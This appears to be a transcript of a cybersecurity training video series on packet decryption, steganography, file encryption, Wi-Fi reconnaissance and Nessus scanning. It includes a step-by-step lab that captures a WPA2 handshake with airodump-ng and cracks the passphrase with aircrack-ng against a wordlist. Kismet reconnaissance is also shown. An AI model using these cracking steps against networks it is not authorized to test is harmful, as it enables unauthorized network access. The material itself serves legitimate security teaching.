[Video description begins] A dialog box called "WEP and WPA Decryption Keys" opens. [Video description
ends]
So we're going to go all the way down to the Is, and there it is, IEEE 802.11. Now I'm going to click the Edit
button down for decryption and I'm going to add a new entry here, we're not using wep or anything like that.
[Video description begins] He clicks a button called "+". A new entry gets added. [Video description ends]
[Video description begins] He clicks a drop-down list box called "Key type" and a drop-down list appears. He
selects an option called "wpa-pwd" from the drop-down list. [Video description ends]
And the password here for this sample packet capture is Induction.
[Video description begins] He enters Induction under a column header called "Key". [Video description ends]
[Video description begins] He clicks a button called "OK" and the WEP and WPA Decryption Keys dialog box
closes. [Video description ends]
Now if we started looking through these packet captures, let's pick on one just for fun here, how about we go
way, way down.
[Video description begins] He clicks a button called "OK" and the "Wireshark • Preferences dialog box
closes. [Video description ends]
[Video description begins] He points to the first section in the content pane. [Video description ends]
Here we can see that if we start to break down the packet headers, we can see some detail. Logical-Link
Control, Internet Protocol, finally an IP header, User Datagram Protocol, UDP header with port information.
[Video description begins] He points to the second section in the content pane. [Video description ends]
And we can see the details, in this case, a Multicast Domain Name System. We can see more beyond just the
IEEE 802.11 headers. And that's only because we've entered the decryption passphrase, in this case for WPA.
Now that's packet 581, let's just double check here. Let's go back into Edit, Preferences and let's turn off
decryption to see how packet 581 looks after the fact.
[Video description begins] The "Wireshark • Preferences dialog box opens. [Video description ends]
Let's make sure we jump into the Is, IEEE 802.11. I'm going to remove the check-mark for enable decryption
and click OK. And packet 581, again, we can't really make much sense of it.
[Video description begins] The "Wireshark • Preferences dialog box closes. [Video description ends]
We've lost all of the headers because we don't have a way to decrypt what's actually in that transmission.
[Video description begins] He points to the second section in the content pane. [Video description ends]
So this is going to be important if you are capturing and analyzing traffic on a multitude of wireless networks
that are using, for example, WPA passwords.
Find out how to use hashing to detect file changes through steganography.
Objectives
[Video description begins] Topic title: Steganography and Hashing. The presenter is Dan Lachance. [Video
description ends]
[Video description begins] A command window called “Administrator: Windows PowerShell” opens. The
following prompt is displayed: PS D:\Steg>. [Video description ends]
Now, in our context, we're going to be doing an example of hiding a message within a jpeg image. Now this is
one way to covertly transmit what looks like a benign message with perhaps a simple picture to someone over
the Internet, when in fact there's an embedded message in the picture. So here in drive DMI machine in the
Steg folder, if I do a dir, I've got two files.
[Video description begins] He executes the following command: dir. The output displays list of files in the
directory. The prompt does not change. [Video description ends]
One of which is a jpg, dogs.jpg. Let's just open that up and see what it looks like.
[Video description begins] He opens the File Explorer window. [Video description ends]
So here in the GUI, there's dogs.jpg on drive D under Steg. And if we just double-click to open it up, we can
see indeed it is a picture of two dogs, so it looks pretty innocent, and it's fun. However, we're going to use this
tool, there are plenty of tools out there that will do this. A Jpeg_FileHider type of tool, where we can embed a
file within the jpg. Let's go ahead and create one. I'm going to right-click here and choose New. And I'm going
to create a new text file. And this is going to be Secret.txt and within it I'm going to type This is a secret.
[Video description begins] He opens a file called "Secret.txt". [Video description ends]
All right, let's close and Save that and let's get this done.
[Video description begins] He double-clicks a file called “Jpeg_FileHider.exe”. A message box called
“Welcome to JPHS for Windows” opens. [Video description ends]
So I'm going to open my Jpeg_FileHider tool, my steganography tool, accept the terms of usage, and I'm going
to open up this jpeg file.
[Video description begins] He clicks a button called “Yes, I accept these terms”. A window called “JPHS for
Windows – Freeware version BETA test rev 0.5” opens. [Video description ends]
So we can now see the dogs.jpg file has been selected here. Then I'm going to click the Hide button up at the
top or the Hide menu, and I'm going to enter and confirm a pass phrase, after which I will click OK.
[Video description begins] A dialog box called "Enter the pass phrase and confirmation" opens. [Video
description ends]
Then I'm going to embed my Secret.txt, so select the file you want to hide.
[Video description begins] A dialog box called "Select the file you want to hide" opens. [Video description
ends]
So select that and click Open. We can see the Hidden file here.
[Video description begins] The Select the File you want to hide dialog box closes. The JPHS for Windows –
Freeware version BETA test rev 0.5 window is displayed. [Video description ends]
So at this point, I'm just going to click Save jpeg. Now we could also save it as something else. Maybe we will
here, we'll save it as dogs2.jpg. So once that's been done we can see dogs2.jpg is the resultant file, and there is
in the background. So let's just minimize this for a minute. And let's just open up dogs2.jpg Okay, let's just go
back and look at the other dog file because it looks pretty much the same, at least visually it does. Well, that's
the whole point. But with steganography, we're hiding something, our secret message within something that
looks innocent. Well, how do you detect this? Well, one way to do this is using file hashing. Given that you
had the opportunity to get the original file hash, let's go to PowerShell and let's test this out.
[Video description begins] He opens the Administrator: Windows PowerShell window. The following prompt
is displayed: PS D:\Steg>. [Video description ends]
Now here in PowerShell, let's clear the screen and type dir, we now have dogs.jpg and dogs2.jpg.
[Video description begins] He executes the following command: cls. The screen gets cleared and the prompt
does not change. He executes the following commands: dir. The output displays list of files in the directory.
The prompt does not change. [Video description ends]
[Video description begins] He executes the following commands: get-filehash dogs.jpg. The output displays
details in a table with three columns and one row. The column headers are Algorithm, Hash, and Path. The
prompt does not change. [Video description ends]
The hashes are not the same. What does that tell us? It means that since the original file existed, something has
been modified in it even though it might look exactly the same. This is not the same hash value.
[Video description begins] He highlights the Hash values in the output of commands: get-filehash dogs.jpg
and get-filehash dogs2.jpg. [Video description ends]
So this is one way to be able to detect that a change has occurred, when otherwise might be very difficult to
determine that, that has happened. But again, you have to have access to the original file hash in order to be
able to make this determination.
[Video description begins] He switches to the File Explorer window. [Video description ends]
Now to complete this example, let's open up our Jpeg_FileHider tool again, and we're going to open up the
dogs2.jpg.
[Video description begins] The Welcome to JPHS for Windows message box opens. [Video description ends]
Okay, so dogs2 specified, now I'm going to click Seek, and it wants the pass phrase.
[Video description begins] The JPHS for Windows – Freeware version BETA test rev 0.5 window
opens. [Video description ends]
So both parties would have to have knowledge of this pass phrase for this to work.
[Video description begins] The Enter the pass phrase and confirmation dialog box opens. [Video description
ends]
And as soon as I enter the correct pass phrase it says Save the hidden file as, well, this is interesting.
[Video description begins] A dialog box called "Save the hidden file as" opens. [Video description ends]
Let's call it Secret2, just so we can have another file here and keep things straight. And I'll close out here and
I'll open Secret2 and there's the contents of it.
[Video description begins] He clicks a button called “Save” and the Save the hidden file as dialog box closes.
A file called "Secret2.txt" opens. [Video description ends]
So this is one way that steganography can be implemented to hide messages in otherwise normal looking files.
monitor, block, and configure notifications for devices on a Wi-Fi network using the eero app
[Video description begins] Topic title: Wi-Fi Connected Devices. The presenter is Dan Lachance. [Video
description ends]
Knowing what's on your network goes a long way in helping you secure assets on that network.
[Video description begins] Various apps are displayed on the Android phone. [Video description ends]
In this example, I'm on my Android phone where I've got the eero app installed, E-E-R-O. eero makes wireless
access points and extenders that you can place throughout a facility. So I'm going to go ahead and click on that
to get some stats about my network.
[Video description begins] An app called "eero" opens. [Video description ends]
So I've got three eeros devices label on the left here as Living Room. I've got a Basement, and I can see ten
devices are connected. And I've got a Hallway upstairs where I can see that four devices are connected. We can
also see the status of other things, such as whether the nightlight option is turned on on that device and its
specific IP address, and its firmware version number.
So we want to make sure we keep those up to date. If there is an update available, and we can see that when we
go into these things, as we take a look. If it says there's an update available, tap to begin update, that is
something we want to make sure we do and document in case there are security vulnerabilities. Back on the
main page at the very top, I can see I've got 17 connected devices. I'm going to click on that. So I can see the
vendors and which are idle. And I can also click on any one of those to get further details.
[Video description begins] He clicks a device name called "HFX-HFX-LP81378" and the device details are
displayed. [Video description ends]
So this device happens to be connected to the five gigahertz network through the Basement eero access point
device. I can see the current activity here in terms of downloads and uploads. I can see it's an Intel device, the
IP address, the MAC. And I even have an option at the bottom to block that device from connecting to the
network if I don't recognize it. But I do recognize it, so I don't need to do that, so I'm going to go back. And I'll
do that twice. You can also see the top devices by usage here at the very top.
[Video description begins] He again clicks the HFX-HFX-LP81378 device name and the device details
displayed. [Video description ends]
So if I were to click on one of these, I get a sense of the devices that have the most activity for downloads and
uploads. So if you're having network congestion issues, you can look at that. Also at the bottom I can see the
overall bandwidth available on this wireless network through those three access points. So at 351 megabits per
second to download, and 11 megabits per second up. Now if I go into some of the config settings for this app,
so I'm just going to go into Network Settings, one important thing I might consider is Notifications.
First of all, Software updates. So I want to know when the network is updated. That would be good. So I'm
going to TURN ON NOTIFICATIONS for that and down below, New devices. Do you want to be notified
when a new device joins your network? I most certainly do on this phone. So I'm going to go ahead and turn
that on. And then we're good to go. So it's just something to think about even on smaller networks, especially
in a wireless environment with multiple access points. You may want to take a look at the specific
configuration and turn on some of these simple options that can go a long way in securing your Wi-Fi network.
[Video description begins] Topic title: Third-party File Encryption. The presenter is Dan Lachance. [Video
description ends]
There are many security standards and laws and regulations that will require the protection of data at rest for
sensitive data. In other words, confidentiality through encryption.
[Video description begins] He opens the File Explorer window. [Video description ends]
And there are many ways to do that. Here in Windows, if this is on a disk that supports BitLocker, I could use
BitLocker disk encryption.
[Video description begins] He right-clicks a file called “HR_EmployeeList.xlsx” and selects an option called
“Properties”. A dialog box called “HR_EmployeeList.xlsx Properties” opens. It contains tabs called
"General", "Security", "Details", and "Previous Versions". The General tab is selected. It includes a button
called "Advanced". [Video description ends]
I could right-click on the file and go into the Properties. And under Advanced, if the machine supported it, I
would be able to choose encrypt contents, that's Encrypting File System.
[Video description begins] He clicks the Advanced button and a dialog box called "Advanced Attributes"
opens. [Video description ends]
The reason it's great out here is because I'm doing this on a Windows 10 Home Edition computer. One of the
features that's unavailable in the Home Edition is EFS or Encrypting File System on NTFS volumes.
[Video description begins] He clicks a button called "Cancel" and the dialog box closes. [Video description
ends]
[Video description begins] He clicks a button called "Cancel" and the HR_EmployeeList.xlsx Properties
dialog box closes. [Video description ends]
I've already installed a tool called AxCrypt. This is a free third-party encryption and decryption tool. So I'm
going to right-click on my file, and in the context menu, you can see I've selected AxCrypt. I'm going to
choose Encrypt. And when I do that, it wants me to enter a passphrase and verify it.
[Video description begins] A dialog box called "AxCrypt 1.7.2976.0"opens. [Video description ends]
So I'm going to go ahead and do that. Now optionally, instead of a passphrase, I could specify a key file that
would be used for encryption and decryption. But I won't do that and I don't want to turn on any of these
defaults. I just want to encrypt the file. So I'm going to click OK. And notice that the icon changes, plus we
also have the axx file extension.
[Video description begins] He clicks a button called "OK" and the dialog box closes. [Video description ends]
So if I try to open up that file, it says, well, it's encrypted, enter the passphrase.
[Video description begins] He points to a file called "HR_EmployeeList-xlsx.axx". [Video description ends]
[Video description begins] He double-clicks the HR_EmployeeList-xlsx.axx file name. The AxCrypt 1.7.2976.0
dialog box opens. [Video description ends]
If you don't know it, you don't get in, however, I do know it. Let's go ahead and pop it in to see what happens.
[Video description begins] He clicks the OK button and the dialog box closes. [Video description ends]
All right, at this point, it looks like our file has opened up.
[Video description begins] The HR_EmployeeList.xlsx file opens in the Microsoft Excel window. [Video
description ends]
So we have a very simple way to encrypt and decrypt files using third-party tools, even if we have entire
subdirectories.
[Video description begins] He closes the Microsoft Excel window. [Video description ends]
[Video description begins] He double-clicks a folder called "Projects". [Video description ends]
[Video description begins] He right-clicks a folder called “Projects” [Video description ends]
So I can right-click on Projects, choose Encrypt, and I'm going to go through and enter a passphrase and verify
it, just like it did with the individual file. Okay, and I'll click on OK.
[Video description begins] The AxCrypt 1.7.2976.0 dialog box opens. [Video description ends]
And after a second, go into Projects, everything is encrypted automatically. So this is great. We have the
ability to easily encrypt and decrypt items by simply right clicking on them. There are many tools that will do
this and many of them are free and use very strong encryption.
[Video description begins] He right- clicks the Projects folder. A dialog box called “About AxCrypt
1.7.2976.0” opens. [Video description ends]
For example, if I go to AxCrypt and choose About, I can see some of the details such as the version of it and
the copyright year, from which I could then learn more about it in terms of the encryption ciphers being used.
So if I were to pop in a web browser using my favorite search engine, I would then be able to search up
axcrypt encryption cipher. And we can see it uses AES-128 and AES-256 encryption.
[Video description begins] He opens the Google search. [Video description ends]
In this video, you will use aircrack-ng to crack protected Wi-Fi networks in Kali Linux.
Objectives
[Video description begins] Topic title: Aircrack-ng. The presenter is Dan Lachance. [Video description ends]
Brute force password attacks are a method of using a list of passwords, normally from a file, that are fed into a
potential victim or target. And that could be user accounts in a Microsoft Active Directory environment. Or as
in our case, we could be using a password file to try to brute force the password for a WPA2 protected Wi-Fi
network.
[Video description begins] He opens a web site called “router.asus.com/index.asp”. It contains a page, which
is divided into three parts. The first part includes buttons called “Logout” and “Reboot”. The second part is a
navigation pane. The third part is a content pane. The content pane includes two sections. [Video description
ends]
So here, I've got the configuration page in my browser pulled up for our sample wireless router. This is a
wireless router entirely under my control for testing purposes. You don't want to run these kinds of tests
against wireless routers that you don't have permission to do that to. It could be considered illegal to try to
crack these passwords because there is an intention of privacy. So be careful how you use these tools. So I
could see if I click in the WPA-PSK, it's the Pre-Shared Key field, I can see we have a variation of the word
password, is the password for this Wi-Fi network.
I can also see the wireless network name, the SSID, up at the top here, the wireless network is called RT-
N600_28_2G.
[Video description begins] He opens a command prompt window called "dlachance@kali: ~". The following
prompt is displayed: root@kali:~#. [Video description ends]
Here in Kali Linux, I'm going to type iwconfig where I can see I've got a wireless network interface here called
wlan0.
[Video description begins] He executes the following command: iwconfig. The output displays the details of
the interfaces. The prompt does not change. [Video description ends]
What I need to do is put that into what's called monitoring mode. Because what we want to do is watch any
conversations between clients that are authenticating to the wireless router. If we can capture that traffic, we
can then try to brute force it to guess what the password is.
[Video description begins] He clears the screen and the prompt does not change. [Video description ends]
Here in Kali Linux, I'm going to type iwconfig, where I can see I've got a wireless adapter in the form of an
interface called wlan0. So here I'm going to run airmon, I want to monitor network traffic. I want to start it and
the interface I want to do that for is wlan0.
[Video description begins] He executes the following command: airmon-ng start wlan0. The output displays
the details of the wlan0 interface. The prompt does not change. [Video description ends]
Now what we're trying to do here with monitoring traffic, we want to capture any clients that are
authenticating to the wireless router. And then dump that into a capture file. And what we're going to do then is
try to brute force the password from the password list against the capture file. So I'm going to clear the screen
and type iwconfig once again.
And when I do that, notice the interface has been renamed. Now it's called wlan0mon, that's good. That means
we are now in monitoring mode. So now what we want to do is start to gather some information about clients
that will be authenticated to that wireless network. First things first, let's run airodump-ng, and right now our
interface is called wlan0mon. What I want to do with this is get a list of wireless routers in the vicinity and also
get their address information.
[Video description begins] He executes the following command: airodump-ng wlan0mon. The output displays
a list of wireless routers and their details. [Video description ends]
Each of these lines that we see here is showing me a number of different wireless networks. There's our RT,
well, it keeps changing, but there's our Arris, there's our RT-600. There's all kinds of wireless networks that
show up here. We can see if they are using WPA2 or if they're open or WPA3.
And we can also see the 48-bit MAC address, the hardware address for the wireless interface in each of those
wireless routers.
[Video description begins] He points to the entries in a column called “ENC”. [Video description ends]
And we can also see the 48-bit MAC address, the hardware address for the wireless interface in each of those
wireless routers. And that's under the BSSID column. Now having done that, what I really want to do is just
press Ctrl+C to get out of there, it says Quitting... at the bottom. Our network that we are interested in is this
one RT-N600_28_2G.
[Video description begins] He points to the entry in the “ESSID” column. [Video description ends]
We can see it's listening on channel 9. And we can also see its MAC address which I'm going to select and
copy by pressing copy. Now why did I copy that? Because we need to focus our attention on monitoring traffic
for clients authenticating to that specific interface on that wireless network. Okay, so having done that, how do
we make that happen?
[Video description begins] He clears the screen and the prompt does not change. [Video description ends]
So now we're going to airodump-ng --bssid. And I'm going to right-click to paste in the MAC address of the
Wi-Fi interface in our wireless network router. Then I'm going to specify -c 9 because remember that wireless
network is using channel 9 for communications. I'll use the --write parameter to write out to a file. I'm going to
do that by specifying a location so maybe the slash the root of the file system on this host and wpa, that'll be
the prefix for the captured file names. And finally, I need to specify the interface I want it captured on and we
know that that is now called wlan0mon.
[Video description begins] He executes the following command: airodump-ng --bssid 34:97:F6:A8:0F:28 -c 9
--write /wpa wlan0mon. The output displays the details of the RT-N600_28 wireless network. [Video
description ends]
When I press Enter, what I'm seeing at the top here is simply a reference that yes, that is the MAC address of
that wireless network. What I want to do at this point is make a connection from a client device. So I'm going
to use my smartphone to make a connection to that wireless network.
[Video description begins] The details of the RT-N600_28_2G wireless network display. [Video description
ends]
And sure enough, we can now see that we've got a connection on our wireless network from a client device.
[Video description begins] He highlights "34:97:F6:A8:0F:28" in the BSSID column. [Video description ends]
Now what happens is we want to be capturing traffic when that occurs. Now if clients are already connected,
we can actually de-authenticate them. There is a command in Linux that will allow us to do that. It's the
aireplay -ng command. You can de-authenticate them which forces a re-authentication. Hang around and wait
for this to happen. In this case, we just happened to see a client has connected. So we're ready to go, I'm going
to leave that open and switch to another terminal screen for Kali Linux. Now before we do that, just to note,
we know that we've got what we need because we can see the WPA handshake was captured.
[Video description begins] He highlights the text: "WPA handshake: 34:97:F6:A8:0F:28". [Video description
ends]
We see this in the upper right. We don't see what it is but we know it was captured. So now we can compare
our brute force password list against this.
[Video description begins] The following prompt is displayed: root@kali:~#. [Video description ends]
So back here in Kali Linux in the second terminal window, I'm going to use the cat command to take a look
at /usr/share/wordlists/. And I've got a sample text file where I've placed just a handful of password variations
so we can expedite this example.
[Video description begins] He executes the following command: cat /usr/share/wordlists/sample.txt. The
output displays the content of the file. The prompt does not change. [Video description ends]
Realistically, you would have a larger file. And if I just bring up the up arrow key there is a sample here in
Kali Linux, it's called rockyou.txt. And that's a much larger file with many many variations as you can see.
[Video description begins] He executes the following command: cat /usr/share/wordlists/rockyou.txt. The
output displays the content of the file. The prompt does not change. [Video description ends]
And so there's no specific amount of time it might take to crack this password through brute force mechanisms.
However, it's going to be much quicker because we have just a tiny sample.txt file here.
[Video description begins] He clears the screen and the prompt does not change. He executes the following
command: cat /usr/share/wordlists/sample.txt. The output displays the content of the file. The prompt does not
change. [Video description ends]
Okay, let's make this happen. So first things first, we also want to make sure we know which capture files are
currently being used. So if I do an ls of the root in any files that end with .cap, we'll use the prefix of wpa to
write output to.
[Video description begins] He executes the following command: ls /*.cap. The output reads: /wpa-01.cap. The
prompt does not change. [Video description ends]
So there's the file, wpa-01.cap, that's important to know. And you'll see that as we enter in this current
command. So what we're going to do, we're going to run aircrack-ng and I'm going to specify the name of the
capture file here on the root that we are interested in. So that would be wpa-01.cap. The next thing we have to
do is specify our word list, -w that's /usr/share. And we just looked at that a moment ago, and it was called
sample.txt. That's it, press Enter.
And immediately, this is what we're looking for. It found the key. It knows that the passphrase to connect to
this WPA2 wireless network is shown here as a variation of the word password.
[Video description begins] He highlights the text: KEY FOUND! [ Pa$$w0rdABC123 ] in the output. [Video
description ends]
Now we're lucky here it was very quick because we have a tiny word file. It could take much longer than this
from reality, but it is possible.
During this video, you will learn how to use Kismet to detect wireless networks.
Objectives
[Video description begins] Topic title: Kismet. The presenter is Dan Lachance. [Video description begins]
One tool that can be used to perform reconnaissance for Wi-Fi networks is to use the Kismet tool, which is
built in to Kali Linux.
A command prompt window called “dlachance@kali: ~” opens. The following prompt is displayed:
root@kali:~#. [Video description ends]
Get started here in Kali Linux, I'm going to run iwconfig to list my wireless interfaces and here I have one
called wlan0.
[Video description begins] He executes the following command: iwconfig. The output displays a list of
wireless interfaces and their details. The prompt does not change. [Video description ends]
The first thing I need to do is put that interface into monitoring mode so we can see all of the traffic and
capture it. So to do that, I'm going to go ahead and run airmon, air monitor -ng start and then the name of my
interface wlan0.
[Video description begins] He executes the following command: airmon-ng start wlan0. The output displays
the details of wlan0. The prompt does not change. [Video description ends]
Now after this is completed, I'm going to run iwconfig again because it will have renamed my interface, so
iwconfig.
[Video description begins] He executes the following command: clear. The screen gets cleared and the prompt
does not change. [Video description ends]
And notice now it's called wlan0mon. Having done that, now I'm going to run kismet dash lowercase c and tell
it the name of my interface wlan0mon.
[Video description begins] He executes the following command: kismet -c wlan0mon. The output displays the
information of wlan0mon. The prompt does not change. [Video description ends]
First time you run kismet, it'll tell you to connect to local host port 2501 to enter in an admin username and
password for the web GUI, which I've already done. Now we can see here it's already collecting information
about Wi-Fi devices within the vicinity. Now the higher gain antenna you have on your machine running this
will allow you to see items that are further and further away than otherwise might be possible. Let's switch
over to the web GUI. So I've connected to the IP address of my Kali Linux installation port 2501.
[Video description begins] He opens a web page called "Kismet". It is divided into two parts. The first part
includes a table with several columns and several rows. The column headers include: Name, Type, Crypto,
Signal, and Channel. The second part contains tabs called “Messages” and “Channels”. [Video description
ends]
And I've authenticated with the username and password I specified for the web GUI, and this is what we see.
We have all Wi-Fi devices shown here in the list. We can see the name of the device or the wireless network.
And in some cases, you might only see a MAC address under the Name column. Now when you see only a
MAC address, what that's going to imply is it's a device that hasn't been configured with the name or it could
be one where the name is being cloaked or hidden. In other words, it's being suppressed and that's something
that can be done in a wireless environment to help increase security. Although technically, let's say paste in the
MAC address here in the upper right in the search field of a MAC address I know exists for a wireless
network.
[Video description begins] The details are displayed in the table. [Video description ends]
We can see it does show up here. And if I click on it to open up some of the details, if I open up the Wi-Fi
section, we can see currently the SSID is being shown as cloaked or empty.
[Video description begins] The corresponding window opens. He expands a section called “Wi-Fi
(802.11)”. [Video description ends]
So even though this is a wireless network where the SSID or the name of the WLAN isn't being broadcast, it
still shows up. It needs to at the radio frequency level, otherwise clients would never be able to connect. Now I
can also see that there's a related item listed down below and it's an access point.
[Video description begins] He expands an option called "Related to 34:97:F6:A8:0F:2C (RT-
N600_28_2G_5G)". [Video description ends]
Well, it's got the same MAC address, but a different name. What this is telling me is that in the past, that used
to be the name of the wireless network associated with this MAC address, but currently it's cloaked. So
perhaps it's been hardened recently.
[Video description begins] He points to RT-N600_28_2G_5G and then points to 34:97:F6:A8:0F:2C. [Video
description ends]
The next thing you'll notice are any connected clients to that Wi-Fi network. So I've got a client here. I can
clearly see the MAC address and apparently it's a Motorola device presumably perhaps a Motorola-based
smartphone, it says Motorola Mobility.
[Video description begins] He expands an option called “Client 5C:51:88:88:F1:59”. He highlights the
following text: Name 5C:51:88:88:F1:59. [Video description ends]
So Kismet then can serve as a great reconnaissance tool to learn about which wireless devices are within range
depending on powerful your antenna is. But at the same time, it's great to do site surveys as well. For example,
to ensure that a wireless network does not send signals beyond the edge of a property for example.
In this video, you will learn how to use Nessus to audit Amazon Web Services (AWS).
Objectives
[Video description begins] Topic title: Cloud Vulnerability Scanning. The presenter is Dan Lachance. [Video
description ends]
One of the most fundamental tasks that you can perform as a cyber security analyst is to conduct periodic
assessments of security controls. And that means running periodic scans or audits of a variety of different types
of systems. In this case, we're going to run a vulnerability scan of Amazon Web Services. Now there are many
ways to do that, one of which is using the Nessus tool which I've already got installed.
[Video description begins] He opens a page called “nessus Professional” in a web browser. It is divided into
three parts. The first part is a menu bar. The second part is a navigation pane. The third part is a content
pane. A page called "My Scans" is open in the content pane. It includes a table with three columns and three
rows. [Video description ends]
And I've connected to Nessus here on my local host, it's listening by default on port 8834. Now once you've
signed into Nessus and gone to the My Scans folder, you have the ability to define New Scan details, which
I'm going to do. So I'm going to click the New Scan button in the upper right, we are here to scan our AWS
cloud environment.
[Video description begins] A page called "Scan Templates" opens. [Video description ends]
Naturally, you have to have an AWS account with some resources deployed, which I do. So I'm going to scroll
all the way down to the COMPLIANCE section where I'm going to choose Audit Cloud Infrastructure.
[Video description begins] A page called "New Scan / Audit Cloud Infrastructure" opens. [Video description
ends]
For the Name of the scan, I'm going to call it My AWS Scan, and I'm going to go to the Credentials section,
click on Amazon AWS.
[Video description begins] He selects a tab called “Credentials”. The corresponding page opens. [Video
description ends]
But notice we can also audit Microsoft Azure, Office 365, Rackspace, Salesforce.com. Now for AWS I need to
supply the AWS Access Key and Secret Key. These can be generated, for example, when you first sign up for
AWS, and the AWS access key is always available, you can always view that in the AWS GUI in the
management console. The secret key is something you would have downloaded along with the access key, so
you need to safeguard that file.
[Video description begins] He opens a web page called "AWS Management Console". [Video description
ends]
So here in the AWS Management Console, how would I go about at least seeing the access key or maybe
generating a new access and secret key? All you would do is go to your account name once you sign in in the
upper right, which I'll click on, and then you would choose My Security Credentials.
[Video description begins] A web page called "IAM Management Console" opens. [Video description ends]
That opens up the IAM management console, what you want to do is on the right, you want to open up Access
keys.
[Video description begins] He expands an option called “Access keys (access key ID and secret access
key)”. [Video description ends]
You'll see any access keys that might have been created, what you won't see is the secret key. Now, both of
them can be downloaded when you create a new access key. So the access key and the secret key, you can
download those and save them. So I've already done that so I'm going to go ahead and fill in the details here.
[Video description begins] He switches to the nessus Professional page. [Video description ends]
This is required because it's how Nessus will authenticate to AWS to run the vulnerability scan.
[Video description begins] He enters the value in text boxes called “AWS Access Key ID” and “AWS Secret
Key”. [Video description ends]
Once I've done that down below, I have to determine which AWS geographical regions in which I have
resources deployed, like virtual machines, web apps, storage accounts, all that stuff. So I can select the ones
that I'm interested in. In this case, I'm going to choose us-east-1, and ca-central-1 because I know I've got stuff
in those locations. Now, I can go under Plugins and I can choose exactly all of the items that I wish to include
besides the default settings that will be scanned for.
[Video description begins] He selects a tab called “Plugins”. [Video description ends]
[Video description begins] He selects a tab called “Compliance”. [Video description ends]
CIS stands for Center for Internet Security, so I can look at some Amazon Web Services best practices that we
can check against for that.
[Video description begins] He selects an option called "CIS Amazon Web Services Foundations L2
1.2.0”. [Video description ends]
I'm going to do that for Web Services Foundations, also Three-tier Web Architecture.
[Video description begins] He selects an option called "CIS Amazon Web Services Three-tier Web
Architecture L2 1.0.0”. [Video description ends]
So I've got all of this items available here, I can filter them also for Amazon AWS, so it's really up to me what
I want to do.
[Video description begins] He selects a drop-down list box called "CATEGORIES" and selects an option
called "Amazon AWS". [Video description ends]
So I've selected a couple of items here, I'm going to go ahead and click Save, and I didn't schedule it, I could
have scheduled that AWS scan.
[Video description begins] The My Scans page opens and a scan called "My AWS Scan" is displayed in the
table. [Video description ends]
But instead I'm going to go ahead and select it here by putting a checkmark in the box and over on the far right,
I'm going to click the Launch button. And we'll then see that our AWS scan has begun, so we can see it started
here along with another scan that's running in the background. Before too long we'll see that the AWS scan has
completed, so let's click on it and take a peek at what we've got.
[Video description begins] A page called "My AWS Scan" opens. It includes a Compliance status bar. [Video
description ends]
This doesn't look good, there's a lot of red. And red here means that based on what it scanned in my AWS
account in the selected regions, there are a lot of non-compliant items. At least as compared to the Center for
Internet Security best practices. So let's click and let's see what's going on.
[Video description begins] He clicks the Compliance status bar and the corresponding page opens. [Video
description ends]
All right, something about a Customer Master Key, a CMK. I need to make sure I have one created that can be
used for encryption, instead of allowing Amazon to generate the keys and use those keys.
[Video description begins] He clicks an option with a failed severity and the corresponding page
opens. [Video description ends]
So sometimes for regulatory compliance, you need to control the keys that are used for encryption as opposed
to a cloud service provider. Let's go back to the vulnerabilities.
[Video description begins] He clicks a tab called “Vulnerabilities” and the corresponding page opens. [Video
description ends]
I should make sure that my ELB, Elastic Load Balancer is using an HTTPS listener. Well, that's kind of
important, so I can scroll through a lot of these things to find out what it is I need to do to harden my
environment. We can also see items such as VPC flow logging and not being enabled in all VPCs. In Amazon
Web Services a VPC is just a virtual network defined in the cloud, and flow logging allows you to monitor the
traffic. But you can see there are some items here for compliance that have been passed, such as ensuring that
hardware MFA or Multi-Factor Authentication is enabled for the root account. So all of these items, of course,
can then be written out to report, whether it be PDF, HTML, or CSV formats.
[Video description begins] He clicks a drop-down list box called "Report" and selects an option called "PDF".
A dialog box called "Generate PDF Report - 1 Host Selected" opens. [Video description ends]
I'm going to go ahead and render this as a PDF report, I'm going to click Generate Report.
[Video description begins] He clicks a button called "Generate Report". A PDF file called "AWS.pdf"
opens. [Video description ends]
And after the report is rendered, this is kind of what it looks like, let me just go ahead and kind of reduce the
zoom, just so we get a sense of what we're looking at here. So we've got an executive summary and we can see
the audit checks and what has passed and what has failed. So we know where to focus our energy to harden our
AWS cloud computing environment.
In this video, you will use Nessus to scan LAN hosts for malware.
Objectives
It's absolutely crucial, where possible, to ensure that every computing device, whether wired or wireless, has
an anti-malware scanner on it. Now, in some cases, that's not possible. Perhaps with some IoT devices, you
can't install that component because it's basically firmware that doesn't allow that configuration. Or you might
have specialized equipment such as for aviation engine diagnostics, or medical equipment that just doesn't
allow it, in which case, those devices should be isolated on a separate network.
[Video description begins] The nessus Professional page opens in a web browser. The My Scans page is open
in the content pane. [Video description ends]
However, I can use tools like Nessus, which I've logged into here, I've got my own local installation. I can use
Nessus to run many different types of vulnerability scans, including malware scans. So I can have a central
way to reach out to devices on the network and connect to them, ideally with credentials, so I can specify
those, and look for malware. Let's do that. So I'm in the My Scans folder here in Nessus, I'm going to click the
New Scan button in the upper right, and I'm going to conduct a Malware Scan.
[Video description begins] The Scan Templates page opens. [Video description ends]
So I'm going to click on that. I'm going to call this Scan for Malware - East1 LAN.
[Video description begins] He clicks an option called “Malware Scan” and a page called "New Scan /
Malware Scan" opens. It includes tabs called "Settings", "Credentials", and "Plugins". The Settings tab is
selected. [Video description ends]
Next thing I want to do is click Credentials, because here I can specify credentials for SSH as well as for
Windows.
[Video description begins] The corresponding page opens. He clicks a drop-down list box called
“Authentication method” and points to the drop-down options. [Video description ends]
So for example, if I were to click SSH, I can determine the Authentication method, whether it's public key or
password-based authentication, or whether I have a PKI certificate for authentication. And I can do the same
type of thing for Windows.
[Video description begins] He selects an option called “certificate”. [Video description ends]
So when I click Windows, it adds it to the list over here down below the SSH settings. Same kind of thing, I
can choose the Authentication method and fill in the details. This would be a credential scan then, and this is
important in this context because when you're looking for malware, you really want to be able to dig deep into
the specific host. And by providing credentials to log in, we can do that.
Notice that if you have multiple sets of credentials, so maybe I've got different Windows hosts with different
credentials out there on the network, you can click Windows again and it adds another instance of that
credential set. So basically, you can figure your credentials sets the way you wish. Then I am going to go under
Plugins and I'm going to select Backdoors, that would be a quicker scan then selecting everything. But I want
to select everything so I can have an in-depth comprehensive scan result.
[Video description begins] The other options include: “General”, “Windows”, and “Web Servers”. [Video
description ends]
Under Settings, I can also go to Schedule and enable this to kick off automatically periodically, but I won't do
that in this case.
[Video description begins] He selects a link called “Schedule” in the navigation pane and the corresponding
page opens in the content pane. [Video description ends]
So I'm just going to go ahead and fill out my credentials and then I'm going to save this scan. The last thing I'll
do under Settings before I save it is specify the target. In this case, it's going to be every device on my LAN, so
I'm going to specify it in cider notation.
[Video description begins] He enters 192.168.4.0/22 in a text box called "Targets". [Video description ends]
